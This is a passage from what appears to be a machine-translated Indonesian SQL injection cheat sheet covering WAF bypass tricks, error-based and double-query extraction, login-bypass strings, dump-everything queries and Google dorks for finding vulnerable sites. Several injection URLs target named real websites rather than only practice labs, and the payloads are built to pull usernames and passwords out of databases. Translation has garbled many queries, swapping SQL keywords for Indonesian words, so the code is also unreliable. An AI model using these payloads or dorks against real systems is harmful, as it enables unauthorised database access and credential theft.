2741Metode Lanjutan:
2742
2743Sekarang Anda telah belajar tentang Basic WAF Bypassing, saya pikir itu baik untuk memahami Metode yang lebih maju!
2744
27451) Buffer Overflow / Firewall Crash:
2746Banyak Firewall dikembangkan dalam C / C ++ dan kita dapat Crash mereka menggunakan Buffer Overflow!
2747
2748http://www.site.com/index.php?page_id=-15+and+(select 1) = (Pilih 0xAA [.. (tambahkan sekitar 1000 "A") ..]) + / *! uNIOn * / + / *! SeLECt * / + 1,2,3,4….
2749
2750((Anda dapat menguji apakah WAF dapat dihancurkan dengan mengetik:
2751? page_id = null% 0A / ** // *! 50000% 55nIOn * // * yoyu * / all / ** /% 0A / *!% 53eLEct * /% 0A / * nnaa * / + 1,2,3 , 4….
2752
2753Jika Anda mendapatkan 500, Anda dapat memanfaatkannya menggunakan Metode Buffer Overflow! ))
2754
27552) Ganti Karakter dengan Nilai HEX mereka:
2756Kita dapat mengganti beberapa karakter dengan Nilai HEX (URL-Encoded) mereka.
2757Contoh:
2758
2759http://www.site.com/index.php?page_id=-15 / *! u% 6eion * / / *! se% 6cect * / 1,2,3,4….
2760(yang berarti "memilih serikat")
2761
2762Teks ke Hex Encoder (Pilih hasil “Hex Encoded for URLâ€!): Http://www.swingnote.com/tools/texttohex.php
2763
27643) Gunakan Variabel atau Perintah lain, bukan yang umum untuk SQLi:
2765Terlepas dari "UNION SELECT", perintah lain mungkin diblokir.
2766Perintah Umum Diblokir:
2767COMMAND | APA YANG HARUS DIGUNAKAN BUKAN
2768@@ versi | versi()
2769concat () | concat_ws () -> Perbedaan antara concat () dan concat_ws (): http://is.gd/VEeiDU
2770group_concat () | concat_ws ()
2771
2772Belajar MySQL Sangat membantu dalam masalah seperti itu!
2773
27744) Misc Exploitable Functions:
2775Banyak firewall mencoba menawarkan lebih banyak Perlindungan dengan menambahkan Fungsi Prototipe atau Aneh! (Yang, tentu saja, bisa kita manfaatkan!):
2776Contoh:
2777
2778Firewall ini di bawah menggantikan "*" (tanda bintang) dengan Whitespaces! Apa yang bisa kita lakukan adalah ini:
2779
2780http://www.site.com/index.php?page_id=-15+uni*on+sel*ect+1,2,3,4…
2781
2782(Jika Firewall menghapus "*", hasilnya akan menjadi: 15 + union + pilih ....)
2783Jadi, jika Anda menemukan fungsi konyol seperti itu, Anda dapat memanfaatkannya, dengan cara ini!
2784
2785[+] Selain contoh sebelumnya, beberapa jalan pintas lain mungkin:
2786
2787-15+ (uNioN) + (sElECt)….
2788
2789-15+ (uNioN + SeleCT) + ...
2790
2791-15+ (UnI) (oN) + (SeL) (ecT) +….
2792
2793-15 + union (pilih 1,2,3,4…)
2794
2795-h
2796
2797
2798Error Based IS Double Query
2799Error Based = Double Query (Error based 2x)
2800
2801Bagaimana Anda tahu Anda harus menggunakan Error
2802Berdasarkan / Double Query? (Penting!)
2803Ini adalah bagian terpenting dari peretasan web; itu
2804jenis injeksi untuk digunakan dalam situasi yang berbeda.
2805Anda dapat menggunakan Injeksi Informasi Berbasis Kesalahan / Ganda
2806dalam kesalahan berikut yang Anda dapatkan
2807Kode:
2808Sebuah. Pernyataan Pilih Terpilih
2809Memiliki Jumlah Kolom yang Berbeda.
2810b. Kolom Tidak Diketahui 1 atau tidak ada kolom di
2811semua (di halaman web dan sumber halaman)
2812c.Error # 1604
2813Sekarang perhatikan kesalahan-kesalahan itu. Anda akan membutuhkannya.
2814versi:
2815Pendekatan pertama adalah mengetahui versi dari
2816database
2817Untuk melakukan itu kami memasukkan permintaan ini setelah akhir
2818URL
2819www.ddaarchitects.co.uk/click.php?bannerID=%27and(select+min(0)+from+(select+1+a+union+se%C2%ADlect+2)b,(select+1+union + pilih + 2) c + grup + oleh + concat ((pilih + mid (concat (table_nam% C2% ADe, 0x3a, group_concat (column_name)), 1,110) dari + information_schema.columns + di mana + ta% C2% ADble_schema = database () + dan + table_name% 3E '% C2% ADappuser'), masukkan (0x0, a, a, now ()))) - +
2820
2821Kode:
2822www.exmple.com/show?id=4 atau 1 grup oleh concat_ws (0x3a, versi (), floor (rand (0) * 2)) memiliki min (0) atau 1--
2823DATABASE GETTING
2824Langkah kedua: Mendapatkan nama database
2825Untuk mendapatkan basis data, kami memasukkan kueri ini
2826Kode:
2827dan (pilih 1 dari (pilih hitungan
2828(*), concat ((pilih)
2829(cast (database () sebagai char), 0x7e))
2830dari information_schema.tables di mana
2831table_schema = database () limit
28320,1), lantai (rand (0) * 2)) x dari
2833grup information_schema.tables oleh
2834x) a)
2835Perhatikan fungsi batas dalam kueri
2836Sebuah situs web dapat memiliki lebih dari 2 dua basis data, jadi
2837tingkatkan batas hingga Anda menemukan semua nama basis data
2838Contoh: membatasi 0,1 atau membatasi 1,1 atau membatasi 2,1
2839
2840Langkah Ketiga: Mendapatkan NAMA TABEL
2841
2842Nama tabel adalah apa yang kita butuhkan sekarang
2843Berikut kueri yang dapat kami gunakan:
2844Kode:
2845dan (pilih 1 dari (pilih hitungan
2846(*), concat ((pilih)
2847(cor (table_name sebagai char), 0x7e))
2848dari information_schema.tables di mana
2849table_schema = database () limit
28500,1), lantai (rand (0) * 2)) x dari
2851grup information_schema.tables oleh
2852x) a)
2853Jangan juga melupakan fungsi LIMIT yang kami gunakan di sini
2854untuk mendapatkan nama tabel satu per satu
2855CATATAN:
2856Sekarang inilah bagian pentingnya:
2857Ketika Anda mencari tabel terus bertambah
2858batasi sampai Anda menemukan nama tabel yang berharga
2859Misalnya: LIMIT 0,1
2860LIMIT 1,1
2861BATAS 2,1
2862Terus tingkatkan jumlahnya sampai Anda menemukan meja
2863Anda ingin mengekstrak informasi dari
2864Berikut rumusnya: LIMIT N, 1 di mana N adalah a
2865bilangan bulat acak
2866
2867Langkah Keempat: Mendapatkan Kolom dari spesifik
2868NAMA TABEL
2869
2870Baiklah, sekarang Anda telah memilih meja Anda
2871ingin mengekstrak kolom dari, waktu untuk mengeksekusi
2872pertanyaan lain
2873Jadi inilah cara ekstraksi kueri kolom akan terlihat
2874seperti:
2875Kode:
2876dan (pilih 1 dari (pilih hitungan
2877(*), concat ((pilih)
2878(cast (column_name sebagai char), 0x7e))
2879dari information_schema.columns
2880di mana table_name = batas 0xTABLEHEX
28810,1), lantai (rand (0) * 2)) x dari
2882grup information_schema.tables oleh
2883x) a)
2884Perhatikan LIMIT 0,1 FUNCTION dan 0xTABLEHEX
2885Anda perlu mengonversi tabel spesifik Anda menjadi hex
2886dan tambahkan 0x di awal string sehingga
2887dapat dibaca ke situs web
2888Untuk mengonversi string menjadi heksadesimal: http: //
2889www.swingnote.com/tools/texttohex.php
2890CATATAN:
2891Anda perlu menaikkan batas sampai Anda menemukan
2892kolom berharga seperti userName dan
2893kata sandi.
2894
2895Langkah Kelima: Mengekstrak data dari Kolom
2896
2897Baiklah bagian ini mungkin yang terbaik di SQL
2898menyuntikkan situs.
2899Saatnya untuk mendapatkan info dari kolom yang kita miliki
2900Untuk melakukan itu, gunakan query ini
2901Kode:
2902dan (pilih 1 dari (pilih hitungan
2903(*), concat ((pilih)
2904(dilemparkan (concat
2905(COLUMN_NAME, 0x7e, COLUMN_NAME) sebagai
2906char), 0x7e)) dari
2907Batas Databasename.TABLENAME
29080,1), lantai (rand (0) * 2)) x dari
2909grup information_schema.tables oleh
2910x) a)
2911
2912Atau Anda dapat melakukan (@: = 1) atau @ grup + oleh + concat (versi
2913(), @: =! @) + memiliki + mnt (0)
2914
2915© LUNATIC
2916
2917~ h
2918
2919Comment Name
2920-- : MySQL Linux Style
2921--+ : MySQL Windows Style
2922# : Hash (URL encode while use)
2923--+- : SQL Comment
2924;%00 : Null Byte
2925` : Backtick
2926
2927Variable/Function Output
2928@@hostname : Current Hostname
2929@@tmpdir : Tept Directory
2930@@datadir : Data Directory
2931@@version : Version of DB
2932@@basedir : Base Directory
2933user() : Current User
2934database() : Current Database
2935version() : Version
2936schema() : current Database
2937UUID() : System UUID key
2938current_user() : Current User
2939current_user : Current User
2940system_user() : Current Sustem user
2941session_user() : Session user
2942@@GLOBAL.have_symlink : Check if Symlink Enabled or Disabled
2943@@GLOBAL.have_ssl : Check if it have ssl or not
2944
2945integer based ::
2946
2947--
2948-- -
2949--+-
2950)--
2951)-- -
2952)--+-
2953))--
2954))-- -
2955))--+-
2956;%00
2957) ;%00
2958));%00
2959%23
2960%60
2961%90
2962and 1=1
2963and '1'='1
2964and (1)=(1
2965php?id=(1) -- -
2966
2967string based ::
2968
2969'--+-
2970')-- -
2971')--+-
2972'))-- -
2973'))--+-
2974';%00
2975');%00
2976'));%00
2977'%23
2978'%60
2979'%90
2980' and 1=1
2981' and '1'='1
2982' and (1)=(1
2983php?id=(1') -- -
2984
2985string based double quotes ::
2986
2987"-- -
2988"--+-
2989"%23
2990")-- -
2991")--+-
2992"))--+-
2993";%00
2994") ;%00
2995"));%00
2996"%60
2997"%90
2998" and 1=1
2999" and '1'='1
3000" and (1)=(1
3001php?id=(1") -- -
3002
3003©
3004~h
3005
3006ADMIN LOGIN BRUTE FORCE
3007
3008'or 1=1 limit 1 -- -+
3009'or''='
3010' or '1'='1
3011' or 'x'='x
3012' or 0=0 --
3013" or 0=0 --
3014or 0=0 --
3015' or 0=0 #
3016" or 0=0 #
3017or 0=0 #
3018' or 'x'='x
3019" or "x"="x
3020') or ('x'='x
3021' or 1=1--
3022" or 1=1--
3023or 1=1--
3024' or a=a--
3025" or "a"="a
3026') or ('a'='a
3027") or ("a"="a
3028hi" or "a"="a
3029hi" or 1=1 --
3030hi' or 1=1 --
3031'or'1=1'
3032==
3033and 1=1--
3034and 1=1
3035' or 'one'='one--
3036' or 'one'='one
3037' and 'one'='one
3038' and 'one'='one--
30391') and '1'='1--
3040admin' --
3041admin' #
3042admin'/*
3043or 1=1--
3044or 1=1#
3045or 1=1/*
3046) or '1'='1--
3047) or ('1'='1--
3048' or '1'='1
3049' or 'x'='x
3050' or 0=0 --
3051" or 0=0 --
3052or 0=0 --
3053' or 0=0 #
3054" or 0=0 #
3055or 0=0 #
3056' or 'x'='x
3057" or "x"="x
3058') or ('x'='x
3059' or 1=1--
3060" or 1=1--
3061or 1=1--
3062' or a=a--
3063" or "a"="a
3064') or ('a'='a
3065") or ("a"="a
3066hi" or "a"="a
3067hi" or 1=1 --
3068hi' or 1=1 --
3069'or'1=1'
3070
3071~h
3072
3073[~] information_schema.tables [~]
3074
3075/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -
3076
3077/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- -
3078
3079/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -
3080
3081/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- -
3082
3083/*!FrOm*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table
3084
3085/*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table
3086
3087~h
3088
3089Injeksi Berbasis Kesalahan
3090---------------------
3091Injeksi berbasis kesalahan dikerahkan pada database yang didukung oleh MS-SQL.
3092
3093Database: MY-SQL: PHP
3094MS-SQL: .asp atau .aspx
3095
3096Probelm dengan Injeksi Berbasis Kesalahan untuk Peretas
3097-----------------------------------------------
30981. Versi () dan database () tidak berfungsi !!
3099Solusi: @@ version
3100
31012. Anda tidak dapat memanggil semua tabel dari database yang diberikan melalui information_schema.
3102
31033. Anda tidak dapat mengekstrak kolom dari tabel target Anda dalam satu perjalanan.
3104
3105Mengapa dikenal sebagai Injeksi Berbasis Kesalahan
3106-----------------------------------------
3107Itu berarti Anda akan mendapatkan data dalam kesalahan.
3108
3109Target: vulnweb.com: Ini adalah kerangka kerja praktik dari sebuah perusahaan bernama Acunetix.
3110
3111Ia memiliki semua praktek serangan teknologi MY-SQL dan MS-SQL.
3112
3113Langkah 1: Dapatkan metode GET apa pun di URL situs web. I.e Kita harus mencari SOmethoing = Sesuatu.
3114http://testasp.vulnweb.com/showforum.asp?id=0
3115
3116Langkah 2: Periksa penanganan pengecualian.
3117http://testasp.vulnweb.com/showforum.asp?id=0 '
3118
3119Langkah 3: Periksa kondisi yang diperlukan untuk serangan lebih lanjut.
3120http://testasp.vulnweb.com/showforum.asp?id=0 dan 1 = 0;
3121
3122NOte: Error Based Injection bekerja pada aturan LIFO. Terakhir di First out.
3123
3124Sebagai contoh: Jika kita memiliki database dengan tabel seperti berikut
3125utas -> 1
3126guru-> 2
3127kelas-> 3
3128biaya-> 4
3129pengguna-> 5
3130
3131Langkah 4: http://testasp.vulnweb.com/showforum.asp?id=0 dan
31321 = convert (int, (pilih top 1 table_name dari information_schema.tables));
3133
3134Punya Tabel: 'utas' X
3135http://testasp.vulnweb.com/showforum.asp?id=0 dan
31361 = convert (int, (pilih top 1 table_name dari information_schema.tables di mana table_name tidak di ('thread')));
3137
3138Target: 'pengguna'
3139
3140Langkah 5: Dapatkan kolom masing-masing tabel pengguna
3141http://testasp.vulnweb.com/showforum.asp?id=0 dan
31421 = convert (int, (pilih top 1 column_name dari information_schema.columns di mana table_name = 'users' dan column_name tidak dalam ('uname')));
3143
3144Kolom Target: uname, upass
3145
3146Langkah 6: Dapatkan yang tidak benar dan upass
3147http://testasp.vulnweb.com/showforum.asp?id=0 dan
31481 = mengkonversi (int, (pilih top 1 upass dari pengguna));
3149
3150uname: admin
3151upass: tidak ada
3152
3153
3154
3155Pengantar Firewall Aplikasi Web dan IDS dan IPS
3156
3157www.iamrahultyagi.in officialrahultyagi.in
3158-------------------------------------------------- ----------------
3159Firewall Aplikasi Web: Ketika pemilik situs web menyebarkan perangkat lunak aplikasi yang berisi semua jenis database serangan di dalamnya dan menyaring permintaan yang digunakan oleh vistor, maka kita dapat mengatakan bahwa aplikasi yang digunakan di situs web adalah firewall aplikasi web.
3160
3161Jenis WAF
3162---------------------
31631. Perangkat Lunak WAF: Ini adalah teknologi firewall yang seperti aplikasi perangkat lunak yang dapat diinstal pada server web dan karenanya dapat digunakan untuk mengisi konten yang diminta.
3164
3165Linux: Keamanan Mod: Gratis | Dibayar: .php
3166Windows: Dot Defender: Dibayar:. asp aspx
3167
31682. Hardware WAF: Ini adalah sistem UTM (Unified Threat Management Systems) yaitu berisi Antivirus + Firewall + IDS dan IPS + Web Filteration untuk Konten dll dll.
3169
3170Keamanan Mod: Mod Security datang untuk menggambarkan pada awal tahun 2008 ketika peretas berada di puncak dan merusak situs web di seluruh dunia. Ini adalah era ketika ada banyak firewall berbayar tetapi tidak ada solusi untuk organisasi tingkat menengah.
3171
3172Mod Security datang dan memberikan sedikit harapan kepada pemilik situs web bahwa mereka akan melindungi dari peretas.
3173
3174Masalah
3175--------
31761. Database serangan terbatas.
31772. Sumber terbuka tetapi kekurangan dana.
3178
3179OWASP TOP 10 Serangan yang mereka lakukan terbuka. Panggilan ke Peretas.
3180
3181Cara Memasang Keamanan Mod di Ubuntu
3182--------------------------------------
3183$ sudo apt-get install libapache2-mod-security
3184$ sudo a2enmod mod-security
3185$ sudo /etc/init.d/apache2 paksa-ulang
3186
3187Memahami kerja WAF
3188--------------------------------
3189Setiap WAF bekerja pada dua format utama pertama Daftar Putih dan filterisasi Daftar Hitam.
3190
31911. Daftar Putih: Saat kami menyatakan pemilik hanya harus masuk dari suatu IP statis tertentu serta alamat MAC dan nama pengguna dan kata sandi. Oleh karena itu bahkan kata sandi bocor tidak ada yang dapat login situs web kecuali ia tidak berada di IP dan alamat MAC yang sama.
3192
31932. Black List: Ini adalah cara kedua untuk mengamankan situs web maka ia akan memiliki database dari semua serangan non-sense khususnya string based (order by), (union all select) dll. Dll. Apapun permintaan yang membawa jenis ini string dari VISITOR akan disaring oleh daftar hitam dan sebagai respons akan memblokir jika cocok dengan string apa pun dari daftar.
3194
3195Cara Mengonfigurasi Keamanan Mod Anda di Ubuntu Setelah Instalasi
3196-------------------------------------------------- --------------
3197sudo gedit /etc/apache2/sites-available/000-default.conf
3198Setelah membuka file ini yaitu 000-default.conf kita harus mengubah alamat IP dari server atau nama situs web yang lalu lintasnya yang ingin kita saring dari keamanan mod.
3199
3200Memintas Validasi WAF dan Filterasi
3201------------------------------------------
3202
32031. Metode Upper Lower Case
3204
3205union all pilih: UnIoN aLl SeLeCt
3206http://172.16.191.137/dvwa/vulnerabilities/sqli/?id=1 'UnIoN SeLeCt 1,2 - + & Kirim = Kirim #
3207
3208Komentar sebaris: / * * /
3209
32102. Inline Executable Comments
3211/ *! UnIoN * / + / *! ALl * / + / *! SeLeCt * /
3212
3213Langkah 1: Dapatkan tabel dari database
3214http://172.16.191.138/dvwa/vulnerabilities/sqli/?id=1 '/ *! UnIoN * / + / *! aLl * / + / *! SeLeCt * / 1,2 - + & Kirim = Kirim #
3215
3216Tabel Target adalah pengguna
3217
3218Langkah 2: dapatkan kolom
3219http://172.16.191.138/dvwa/vulnerabilities/sqli/?id=1 '/ *! UnIoN * / + / *! aLl * / + / *! SeLeCt * / 1, column_name dari information_schema.columns di mana table_name =' pengguna '- + & Kirim = Kirim #
3220
3221Versi Berdasarkan Inline Komentar yang Dapat Dijalankan
3222----------------------------------------
3223/ *! 50000UnIoN * / + / *! 50000aLl * / + / *! 50000SeLeCt * /
3224
3225Langkah 3: http://172.16.191.138/dvwa/vulnerabilities/sqli/?id=1 '/ *! 50000UnIoN * / + / *! 50000aLl * / + / *! 50000SeLeCt * / 1, column_name dari information_schema.columns di mana table_name = 'users' - + & Submit = Kirim #
3226
3227NOte: Lakukan hal yang sama dengan semua kata query dan lanjutkan dengan serangan. Jika Anda butuh bantuan, kunjungi www.iamrahultyagi.in atau officialrahultyagi.blogspot.in
3228
3229MYSQL
32305.00.00 -> 50000
32314,00,00 -> 40000
32323,00,00 -> 30000
32332,00,00 -> 20000
32341,00,00 -> 10.000
3235
3236©
3237
3238-rkx
3239
3240Penggunaan Kueri Keamanan Tinggi
3241
32421'order oleh 1 #
32431 'union pilih 1,2 #
32441 'union pilih 1, database () #
3245
3246atau 1 = 1 union pilih null, table_name dari information_schema.tables
3247
3248atau 1 = 1 union pilih null, column_name dari information_schema.columns
3249
3250atau 1 = 1 union memilih pengguna, kata sandi dari pengguna
3251
3252Error Base Penggunaan query ganda
3253Sebuah. Pernyataan Pilih Yang Digunakan Memiliki Jumlah Kolom yang Berbeda.
3254b. Kolom Tidak Diketahui 1 atau tidak ada kolom sama sekali (di halaman web dan sumber halaman)
3255c. Kesalahan # 1604
3256
3257Tampilkan Versi
3258atau 1 grup dengan concat_ws (0x3a, versi (), floor (rand (0) * 2)) memiliki min (0) atau 1
3259
3260Tampilkan Database
3261dan (pilih 1 dari (pilih count (*), concat ((pilih (pilih concat (cast (database () sebagai char), 0x7e)) dari information_schema.tables di mana table_schema = database () limit 0,1), floor ( rand (0) * 2)) x dari grup information_schema.tables dengan x) a)
3262
3263Tampilkan tabel
3264dan (pilih 1 dari (pilih count (*), concat ((pilih (pilih concat (cast (table_name sebagai char), 0x7e)) dari information_schema.tables di mana table_schema = database () limit 0,1), floor (rand ( 0) * 2)) x dari grup information_schema.tables dengan x) a)
3265
3266Tampilkan kolom
3267dan (pilih 1 dari (pilih count (*), concat ((pilih (pilih concat (cast (column_name sebagai char), 0x7e)) dari information_schema.columns di mana table_name = 0xTable limit 0,1), floor (rand (0) * 2)) x dari grup information_schema.tables dengan x) a)
3268
3269
3270Buang data dari kolom
3271dan (pilih 1 dari (pilih count (*), concat ((pilih (pilih concat (cast (concat (COLUMN_NAME, 0x7e, COLUMN_NAME) sebagai char), 0x7e)) dari Databasename.TABLENAME limit 0,1), floor (rand (0) * 2)) x dari grup information_schema.tables dengan x) a)
3272
3273-------------------------------------------------- ----------
3274-------------------------------------------------- ----------
3275http: // localhost / sqli-labs-master / Less-5 /? id = 1'and (pilih 1 dari (pilih count (*), concat ((pilih (pilih concat (cast (column_name sebagai char), 0x7e) ) dari information_schema.columns di mana table_name = 0x7573657273 dan table_schema = database () limit 2,1), floor (rand (0) * 2)) x dari grup information_schema.tables dengan x) a) - +
3276
3277Mendapatkan
3278
3279http: // localhost / sqli-labs-master / Less-5 /? id = 1'and (pilih 1 dari (pilih count (*), concat ((pilih (pilih concat (cast (concat (nama pengguna, 0x7e, kata sandi ) sebagai char), 0x7e)) dari batas security.users 0,1), floor (rand (0) * 2)) x dari grup information_schema.tables dengan x) a)
3280- +
3281
3282-------------------------------------------------
3283-------------------------------------------------- -
3284
3285Basis Kesalahan
3286dan (pilih 1 dari (pilih count (*), concat ((pilih (pilih concat (cast (database () sebagai char), 0x7e)) dari information_schema.tables di mana table_schema = database () limit 0,1), floor ( rand (0) * 2)) x dari grup information_schema.tables dengan x) a)
3287
3288Error Base Double Query
3289
3290Tampilkan Versi
3291dan (pilih 1 dari (pilih count (*), concat ((pilih (pilih concat (0x7e, 0x27, cast (versi () sebagai char), 0x27,0x7e)) dari limit information_schema.tables 0,1), floor ( rand (0) * 2)) x dari grup information_schema.tables dengan x) a) dan 1 = 1
3292
3293Tampilkan Database
3294dan (pilih 1 dari (pilih count (*), concat ((pilih (pilih (PILIH concat yang berbeda (0x7e, 0x27, cast (schema_name sebagai char), 0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) dari information_schema .tables limit 0,1), floor (rand (0) * 2)) x dari grup information_schema.tables dengan x) a) dan 1 = 1
3295
3296Tampilkan Tabel dari basis data
3297dan (pilih 1 dari (pilih count (*), concat ((pilih (pilih (PILIH concat yang berbeda (0x7e, 0x27, cast (table_name sebagai char), 0x27,0x7e) FROM information_schema.tables Dimana table_schema = 0xDatabase_Name LIMIT 0,1 )) dari batas information_schema.tables 0,1), floor (rand (0) * 2)) x dari grup information_schema.tables dengan x) a) dan 1 = 1
3298
3299Tampilkan Kolom dari tabel
3300dan (pilih 1 dari (pilih count (*), concat ((pilih (pilih (PILIH concat yang berbeda (0x7e, 0x27, cast (column_name sebagai char), 0x27,0x7e) FROM information_schema.columns Di mana table_schema = 0xDatabase_name DAN table_name = 0xTable_name LIMIT 0,1)) dari batas information_schema.tables 0,1), floor (rand (0) * 2)) x dari grup information_schema.tables dengan x) a) dan 1 = 1
3301
3302Dump Data dari kolom
3303dan (pilih 1 dari (pilih count (*), concat ((pilih (pilih (pilih concat (0x7e, 0x27, cast (table_name.column_name sebagai char), 0x27,0x7e) DARI `security`.table_name LIMIT 0,1) ) dari batas information_schema.tables 0,1), floor (rand (0) * 2)) x dari grup information_schema.tables dengan x) a) dan 1 = 1
3304-------------------------------------------------- ------
3305
3306Dump in one Shot (Database, Tabel, Kolom)
3307(pilih (@x) dari (pilih (@x: = 0x00), (pilih (0) dari (information_schema.columns) di mana (table_schema! = 0x696e666f726d6174696f6e5f736368656d61) dan (0x00) dalam (@x: = / *! 50000concat * / (@ x, 0x3c62723e, table_schema, 0x272d2d3e27, table_name, 0x272d2d3e27, column_name)))) x)
3308
3309(pilih (@) dari (pilih (@: = 0x00), (pilih (@) dari tbl_admin_info di mana (@) dalam (@: = / *! 50000concat * / (@, user_name, 0x3a, kata sandi)))) a )
3310-------------------------------------------------- ----
3311
3312jika concat block gunakan ganti fungsi
3313
3314ganti (REPLACE (ganti (0x5b215d, 0x5b, versi ()), 0x21, database ()), 0x5d, usâ € ‹er ())
3315
3316Function ByPassing
3317
3318* unhex(hex(value))
3319
3320* cast(value as char)
3321
3322* uncompress(compress(version()))
3323
3324* cast(version() as char)
3325
3326* aes_decrypt(aes_encrypt(version(),1),1)
3327
3328* binary(version())
3329
3330* convert(value using ascii)
3331
3332Mengapa Kami menggunakan 50000,12345,00000 dalam / *! * /?
3333
3334Frnds Sekarang saya ingin berbagi sesuatu yang menarik 4u yang merupakan bagian dari SQLI. Hanya 4 pemula.
3335Master bros sudah tahu ini yang harus saya bagikan di sini
3336
3337Topik: Mengapa kami menggunakan 50000,00000,12345 dalam / *! * /?
3338
3339Pendatang baru saya menggunakan semua / *! 12345 * / seperti dat 4 yang melewati WAF. Apakah Anda tahu logika di balik ini mengapa kita menggunakan 12345? Hari ini m memberitahu Anda arti sebenarnya dari ini Tapi pertama setelah membaca komentar ini yang Anda ketahui sebelum arti dari penggunaan dat 12345.00000,50000
3340
3341Jadi, sekarang dengarkan baik-baik
3342
3343Sebenarnya kita menggunakan 12345 bcuj ketika kita menulis ini menjalankan versi MySQL upto 5. Berarti jika versi mysql Anda adalah upto 5 maka Anda dapat menggunakan 00000,12345,50000 atau bahkan Anda dapat menggunakan 56000 tetapi jika versi mysql adalah 5,6 sesuatu. Jadi itu berarti nomor 12345 terkait dengan versi mysql
3344
334512345 berarti => 1.23.4500000 berarti => 0.00.0050000 berarti => 5.00.0056000 berarti => 5.60.00
3346
3347Baca saja semuanya karena jika Anda tidak melakukannya, Anda tidak akan mengerti ini
3348kode dan bagaimana cara kerjanya!
3349
3350Dorks:
3351
3352inurl: "view.asp? page =" intext: "plymouth"
3353
3354Ok apa kode ini?
3355Jadi ini adalah sekolah-sekolah universitas yang dapat diretas dengan sekolah-sekolah universitas dork ini.
3356
3357inurl: "shoutbox.php" intext: "skrip"
3358
3359dengan kode ini Anda dapat meretas shoutbox atau menemukan skrip
3360
3361
3362inurl: "index.php? act =" rapidleech
3363
3364Kode ini akan menemukan situs rapidleecher dengan sangat cepat.
3365
3366inurl: "index.php? act = idx"
3367
3368Kode ini akan menemukan forum ipb dengan cepat untuk diretas
3369
3370inurl: "Photoshop.aspx" "tutorial"
3371
3372Kode ini akan menemukan tutorial photoshop
3373
3374inurl: ftp: // situs ftp: .com
3375
3376Kode ini akan menemukan server ftp apa saja dan membasmi situs yang dilindungi.
3377
3378allinurl: user_index.jsp
3379
3380Kode ini akan menemukan hosting gratis apa pun
3381
3382didukung oleh vbulletin game 3.8.4 inurl: member.php? u = 1
3383
3384Kode ini akan menemukan forum permainan vbulletin dan halaman admin.
3385
3386didukung oleh vbulletin 4.0.3 Informasi Debug
3387
3388Kode ini akan menampilkan semua kode dan informasi kode vbulletin forum
3389dan bugnya Anda rooting ke dalamnya.
3390
3391didukung oleh vbulletin "warez"
3392
3393Kode ini akan menemukan forum warez apa pun.
3394
3395video ke mp3 konverter intext online: "mp3" -intis: "Kualitas Tinggi"
3396
3397Dengan kode ini Anda dapat mengunduh mp3 dari youtube dengan sangat cepat.
3398
3399intext: "Peringatan: mysql_fetch_array ()"
3400
3401Dengan kode ini Anda akan menemukan situs vulnarable dan meretasnya.
3402
3403inurl: radioandtv.php
3404
3405Kode ini akan menampilkan semua torrent stasiun radio tersembunyi.
3406
3407inurl: "postingan.php? mode = smilies" "phpbb"
3408
3409Dengan kode ini Anda akan dapat meretas forum phpbb dan memasukkan xss ke dalam forum.
3410
3411allinurl: alat / spider-view.php
3412
3413Dengan kode ini Anda dapat menemukan tautan situs dengan sangat cepat.
3414
3415embed src = ". mp3" type = audio / mpeg
3416
3417Kode injeksi Html untuk menemukan situs rahasia dengan kode html mp3 embed
3418Anda akan melihatnya bahkan di google.
3419
3420"didukung oleh vbulletin" + "akun dump"
3421
3422Dengan kode ini Anda akan dapat menemukan kata sandi
3423untuk situs apa pun, forum bukan untuk pornografi.
3424
3425allinurl: "buku tamu / smileys.php"
3426inurl: "smileys.php" + "berbicara"
3427allinurl: smiliehelp.php
3428
3429Berbicara smilies.
3430
3431"intitle: index of" admin / FCKeditor / _samples / html
3432
3433Dengan kode ini Anda akan dapat menemukan fck server html
3434editor dan meretasnya.
3435
3436burung hantu kota kunang-kunang + "instrumental"
3437
3438Dengan kode ini Anda akan dapat mp3 instrumental dan mengubah ini
3439burung hantu kota kunang-kunang
3440
3441HTTP / 1.1 :: Mozilla / 5.0 (Windows; U; Windows NT 5.1; en-US; rv: 1.9.2.3)
3442access_log
3443
3444dengan kode ini Anda akan dapat meretas akses situs
3445log dan lihat semua informasi.
3446
3447"google scanner sql" + "php"
3448
3449Google sql injection online meretas situs-situs rentan, forum
3450dan menemukan situs-situs yang rentan sangat mudah.
3451
3452situs: youtube.com *@gmail.com
3453
3454Ini akan menemukan youtube atau email situs apa pun.
3455
3456allinurl: html_colors.html
3457
3458Ini akan menemukan kode grafik html sangat cepat.
3459
3460torrent pribadi + "buka daftar"
3461
3462Ini akan menemukan torrent pribadi yang terbuka untuk didaftarkan.
3463
3464
3465hotfile + mediafire + "http: //" + "rar" horor 2010 dvdrip,
3466(hotfile | mediafire) .rar 2010 horor dvdrip
3467
3468Ini akan menemukan situs-situs rahasia dengan film dvdrip hanya mengubah horor.
3469
3470dvdrip 400mb "2010"
3471
3472Ini akan menemukan film ripping dvdrip dalam 400mb dan terbaru.
3473
3474sql dork bank injeksi
3475
3476Ini akan menemukan bank dorks untuk meretas google.
3477
3478inurl: archive / index.php "visual basic"
3479
3480-4LPH4
3481
3482POST METHOD
3483
3484------------
3485
3486http://mosii.gametrailers.com/getmediainfo4.php?mid=47330 and false UNION SELECT 1,@@version,333,4444,5,6,7,8,0,10,11,12,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
3487
3488http://sharemobile.ro/index.php
3489
3490&login=login&password=xxxxxxxxxx&username=asdasdasd' and false union select 1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 %23
3491
3492http://www.articlemarketingrobot.com/db/select.php
3493
